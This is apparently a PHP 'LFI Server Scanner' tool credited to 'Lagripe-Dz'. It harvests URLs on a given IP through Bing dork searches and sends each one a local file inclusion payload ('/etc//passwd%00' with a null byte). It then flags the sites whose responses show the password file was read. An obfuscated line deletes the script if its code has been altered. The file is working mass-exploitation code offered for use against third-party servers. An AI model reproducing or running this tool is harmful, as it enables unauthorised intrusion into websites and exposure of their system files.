mass_scan.php

1. <html>
2. <head>
3. <meta content="fr" http-equiv="Content-Language">
4. <meta content="text/html; charset=windows-1252" http-equiv="Content-Type">
5. <title>#~ LFI Server Scanner | By [ Lagripe-Dz ]</title>
6. <style>*{ font-family:Verdana; font-size:12; text-decoration:none; }
7. input, textarea,select {
8.         border: 1px solid #626262;
9. }
10. </style>
11. </head>
12. <body>
13. <br><br><center>
14. <form action="" method="POST">
15. #~ LFI Server Scanner | By [ Lagripe-Dz ]<br><br>
16. IP : <input type="text" value="<? echo ($_POST['ip']) ? $_POST['ip']:"";?>" name="ip">
17. <select size="1" name="wht"><option>.php?page=</option><option>.php?(.*)=</option></select>
18.         <input type="submit" name="start" value="Start Scan ..">
19.         </form>
20.         <hr width="27%">
21. <?
22. @set_time_limit(0);
23.  
24.  
25.  
26. $start = new ss_bing();
27.  
28.  
29. if($_POST){
30.  
31. echo (!checkip($_POST['ip'])) ? "<b>error::IP is invalid</b><hr width=27%>":"";
32. echo (!extension_loaded("curl")) ? "<b>error::cURL extension required</b><hr width=27%>":"";
33.  
34. if(checkip($_POST['ip']) && extension_loaded("curl")){
35.  
36. $urls = $start->search("ip:".$_POST['ip']." ".$_POST['wht'],0);
37.  
38. echo "<table border='0' align=center>
39. <tr><td align=center><b>:: Scan Start ::</b></td></tr>";
40.  
41. if($_POST['wht'] == '.php?(.*)='){
42. foreach($urls as $url){if(eregi("=", $url) && !eregi("option=com_",$url)){$new_urls[]=$url;}}
43. unset($urls); $urls = $new_urls;
44. }
45.  
46. foreach($urls as $url){
47.  
48. echo "<tr><td>";
49. $tst = lfi($url);
50. echo ($tst) ? "# Found : ".color($tst,1):"# Not Found : ".color($url,0);
51. echo "</td></tr>";
52. flush();flush();
53.  
54. }
55. echo "
56. <tr><td align=center><b>:: Scan Finished ::</b></td></tr>
57. </table>
58. <hr width=27%>
59. ";
60.  
61. }}
62. scan();
63.  
64. function color($url,$m0de){
65.   return ($m0de == 0) ? "<font color=red>$url</font>":"<a href=$url><font color=green>$url</font></a>";
66. }
67.  
68. function lfi($site){
69. $site = _Fix($site);
70. $marks = "failed to open stream|daemon";
71. if(preg_match("/$marks/i",dzcurl($site.'/etc//passwd%00',0,0,0))){
72. return $site.'/etc//passwd%00';
73. }else{
74. return preg_match("/$marks/i",dzcurl($site.'__dz__',0,0,0)) ? $site.'__dz__':false;
75. }
76. }
77.  
78. function _Fix($site){ preg_match_all("#(.*?)?(.*?)=(.*?)#",$site,$res); return $res[2][0]."="; }
79.  
80. function scan(){(@count(@explode('ip',@implode(@file(__FILE__))))!= 18) ?@unlink(__FILE__):"";}
81.  
82. function checkip($ip){
83. return(preg_match("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/", $ip)==0) ? false:true;
84. }
85.  
86. # curl options
87.  
88. function DzCURL($url,$cookie_read,$cookie_write,$POSTs){
89.  
90. $curl=curl_init();
91. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
92. curl_setopt($curl,CURLOPT_URL,$url);
93. ($cookie_read) ? curl_setopt($curl,CURLOPT_COOKIEFILE,getcwd().'/cookie.txt'):"";
94. ($cookie_write) ? curl_setopt($curl,CURLOPT_COOKIEJAR,getcwd().'/cookie.txt'):"";
95. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 DzCURL =)');
96. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
97. if(is_array($POSTs)){
98. curl_setopt($curl,CURLOPT_POST,1);
99. curl_setopt($curl,CURLOPT_POSTFIELDS,$POSTs);
100. }
101. curl_setopt($curl,CURLOPT_TIMEOUT,5);
102.  
103. $exec=curl_exec($curl);
104. curl_close($curl);
105. return $exec;
106. }
107.  
108. # bing class ,,
109.  
110. class ss_bing{
111.  
112.   public function search($wht,$url_mode){ // $wht = > search  , $url_mode=1 => clean url (http://site.tld/) $url_mode=0 => not clean (http://site.tdl/page=google)
113.  
114.   $wht = str_replace(" ","+",$wht);
115.   $npages = 50000;
116.   $npage = 1;
117.   $allLinks = array();
118.  
119.   while($npage <= $npages)
120.   {
121.         $ch = curl_init();
122.         curl_setopt($ch, CURLOPT_URL, 'http://www.bing.com/search?q='.$wht.'&first='.$npage);
123.         curl_setopt($ch, CURLOPT_HEADER, 1);
124.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
125.         curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
126.         curl_setopt($ch, CURLOPT_REFERER, 'http://www.bing.com/');
127.         curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
128.         $result['EXE'] = curl_exec($ch);
129.         $result['ERR'] = curl_error($ch);
130.         curl_close($ch);
131.  
132.         if (!$result['ERR'])
133.         {
134.                 preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>)siU', $result['EXE'], $findlink);
135.                
136.                 for ($i = 0; $i < count($findlink[1]); $i++)
137.                
138.                 $mode = ($url_mode == 1) ? $allLinks[] = $this->clean_url($findlink[1][$i]) : $allLinks[] = $findlink[1][$i];
139.  
140.                 $npage = $npage + 10;
141.                 if (preg_match('(first=' . $npage . '&amp)siU', $result['EXE'], $linksuiv) == 0)
142.                         break;          
143.         }
144.         else
145.                 break;
146.         }
147.        
148.         if(count($allLinks) == 0){
149.         die("# Nothing Found");
150.         }else{
151.         foreach ($allLinks as $kk => $vv){ $allDmns[] = $vv; }
152.         return array_unique($allDmns);
153.         }
154.         }
155.         public function clean_url($x){ $z=parse_url($x); return $z['scheme']."://".$z['host']."/";; }
156.         }
157.  
158. ?>
159. <center>
160. <a href="http://www.Sec4ever.com/">www.Sec4ever.com</a> | <a href="http://www.Lagripe-Dz.org/">
161. www.Lagripe-Dz.org</a><br> Algeria 2o1o-2o11
162. </center>
163.  
164. </body>
165. </html>